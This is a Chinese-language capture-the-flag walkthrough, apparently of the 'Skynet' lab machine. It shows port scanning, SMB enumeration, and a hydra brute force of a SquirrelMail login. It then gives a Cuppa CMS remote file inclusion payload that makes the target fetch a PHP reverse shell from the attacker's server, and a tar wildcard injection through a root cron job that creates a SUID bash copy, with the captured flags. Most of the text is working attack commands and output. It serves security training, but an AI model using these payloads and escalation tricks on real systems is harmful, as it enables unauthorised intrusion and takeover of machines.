Step1 先使用nmap扫描端口
1 2 ┌──(root㉿kali)-[~] └─# nmap -p- -sC -sV -T4 10.10.2.72
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-21 22:00 EST Nmap scan report for 10.10.2.72 Host is up (0.23s latency). Not shown: 65529 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protoco l 2.0) | ssh-hostkey: | 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA) | 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA) |_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Skynet |_http-server-header: Apache/2.4.18 (Ubuntu) 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: PIPELINING CAPA TOP SASL AUTH-RESP-CODE UIDL RESP-CODES 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: IDLE more OK post-login have IMAP4rev1 capabilities Pre-log in LOGIN-REFERRALS LITERAL+ listed SASL-IR ID ENABLE LOGINDISABLEDA0001 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb2-time: | date: 2024-01-22T03:05:06 |_ start_date: N/A | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: skynet | NetBIOS computer name: SKYNET\x00 | Domain name: \x00 | FQDN: skynet |_ System time: 2024-01-21T21:05:06-06:00 |_clock-skew: mean: 1h59m58s, deviation: 3h27m51s, median: -2s | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required
139/445端口开放,可知目标机开启了SMB服务
1 2 3 enum4linux -S 10.10.2.72 或者 smbclient -L \\10.10.2.72
获取到一些可能能访问的SMB服务账号:anonymous、milesdyson
1 smbclient //10.10.2.72/anonymous
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ┌──(root㉿kali)-[~] [4/149] └─# smbclient //10.10.2.72/anonymous Password for [WORKGROUP\root]: dTry "help" to get a list of possible commands. smb: \> dir . D 0 Thu Nov 26 11:04:00 2020 .. D 0 Tue Sep 17 03:20:17 2019 attention.txt N 163 Tue Sep 17 23:04:59 2019 logs D 0 Wed Sep 18 00:42:16 2019 get 9204224 blocks of size 1024. 5823148 blocks available smb: \> get attention.txt getting file \attention.txt of size 163 as attention.txt (0.2 KiloBytes/sec) (av erage 0.2 KiloBytes/sec) smb: \> cd logs smb: \logs\> dir . D 0 Wed Sep 18 00:42:16 2019 .. D 0 Thu Nov 26 11:04:00 2020 log2.txt N 0 Wed Sep 18 00:42:13 2019 log1.txt N 471 Wed Sep 18 00:41:59 2019 log3.txt N 0 Wed Sep 18 00:42:16 2019 smb: \logs\> get log1.txt getting file \logs\log1.txt of size 471 as log1.txt (0.5 KiloBytes/sec) (average 0.3 KiloBytes/sec)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 ┌──(root㉿kali)-[~] └─# cat log1.txt cyborg007haloterminator terminator22596 terminator219 terminator20 terminator1989 terminator1988 terminator168 terminator16 terminator143 terminator13 terminator123!@# terminator1056 terminator101 terminator10 terminator02 terminator00 roboterminator pongterminator manasturcaluterminator exterminator95 exterminator200 dterminator djxterminator dexterminator determinator cyborg007haloterminator avsterminator alonsoterminator Walterminator 79terminator6 1996terminator ┌──(root㉿kali)-[~] └─# cat attention.txt A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson 翻译: 最近一次系统故障导致多个密码被修改。所有天网员工看到后都必须更改密码。
访问80端口
1 gobuster dir --url http://10.10.2.72 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error
访问http://10.10.2.72/squirrelmail,会跳转到http://10.10.2.72/squirrelmail/src/login.php
Step2 是个登录界面
由上可知账号为milesdyson
密码:cyborg007haloterminator
或者用
1 2 3 hydra -l <username> -P <password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' hydra -l milesdyson -P log1.txt 10.10.2.72 http-form-post "/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown User or password incorrect."
登录进去,可以看到一个邮箱
1 smbclient -U milesdyson //10.10.2.72/milesdyson
1 2 3 4 5 6 ┌──(root㉿kali)-[~] └─# cat important.txt 1. Add features to beta CMS /45kra24zxs28v3yd 2. Work on T-800 Model 101 blueprints 3. Spend more time with my wife
1 gobuster dir --url http://10.10.2.72/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error
得到CMS后台管理的登录页面:http://10.10.2.72/45kra24zxs28v3yd/administrator/
在https://www.exploit-db.com/上搜索关键字Cuppa以查找Cuppa CMS相关的漏洞exp
https://www.exploit-db.com/exploits/25971
step3 构造payload以获取目标shell
1 2 3 http://$IP1/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$IP2/php-reverse-shell.php #IP1为靶机IP,IP2为攻击机IP http://10.10.2.72/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.11.63.201:8000/php-reverse-shell.php
原理:利用相关CMS的远程文件包含漏洞,让目标页面远程包含–本地攻击机所开启的简易服务器上的反向shell文件,这样我们在浏览器中一旦输入上述payload 就能让目标页面弹一个shell到我们的本地攻击机。
Step4 1 2 which python #验证目标机有无Python环境 python -c "import pty ; pty.spawn('/bin/bash')"
1 2 3 www-data@skynet:/home/milesdyson$ cat user.txt cat user.txt 7ce5c2109a40f958099283600a9ae807
Step5 提权
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 www-data@skynet:/home/milesdyson$ cd backups www-data@skynet:/home/milesdyson/backups$ ls backup.sh backup.tgz www-data@skynet:/home/milesdyson/backups$ cat backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * www-data@skynet:/home/milesdyson/backups$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command */1 * * * * root /home/milesdyson/backups/backup.sh 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # www-data@skynet:/home/milesdyson/backups$
backups目录下有一个backup.sh文件,其内容和作用是–切换目录至/var/www/html 并将该目录下的所有内容归档为backup.tgz压缩文件,该tgz文件保存在backups目录下;
通过查看/etc/crontab即定时任务可知–刚才描述的backups目录下的backup.sh文件是一个定时任务,该.sh脚本每分钟都会以root身份执行
在查询 GTFOBins 网站后,我们发现通过tar命令可以利用一个名为–checkpoint的参数,该参数允许在每次归档 X 个文件时(X的默认值为10)显示“进度”消息, –checkpoint还可以与 –checkpoint-action 标志串联使用,–checkpoint-action标志允许在到达检查点(checkpoint)时以二进制或脚本的形式执行某些操作。
结合前述已知信息:由于backups目录下的backup.sh脚本中使用的通配符*将对 /var/www/html 目录中的所有文件和文件夹执行归档命令,因此我们可以通过在/var/www/html下添加 –checkpoint=1 文件(启用检查点功能)和 –checkpoint-action=exec=xxx 文件(指定要执行的操作,检查点值为1,每归档一个文件都执行指定操作),那么当 tar 处理到以上文件时,相关的文件名将会被有效地视为tar命令的参数–从而执行某些操作。
在/var/www/html目录下创建一个BASH脚本,该脚本的执行结果将创建一个实质为bash副本的 SUID 二进制文件,我们将该脚本命名为newroot.sh:
1 echo "cp /bin/bash /tmp/nroot && chmod +s /tmp/nroot" > newroot.sh
继续在/var/www/html目录下执行命令创建以下两个文件,这两个文件的实际作用是以文件名作为 tar 命令行中的参数:
1 2 touch "/var/www/html/--checkpoint=1" touch "/var/www/html/--checkpoint-action=exec=sh newroot.sh"
大约一分钟后,cron 计划作业(即backups目录下的backup.sh脚本)将会以root权限自动运行,从而能够成功创建一个SUID文件(/tmp/nroot),我们可以使用 -p 标志执行该SUID文件,这将允许以该文件的所有者身份(root)执行此二进制文件,进而可以根据此二进制文件的内容切换到root shell。
1 2 3 4 5 #切换到/tmp目录 cd /tmp ls /tmp/nroot -p whoami
1 2 3 nroot-4.3# cat /root/root.txt cat /root/root.txt 3f0372db24753accc7179a282cd6a949
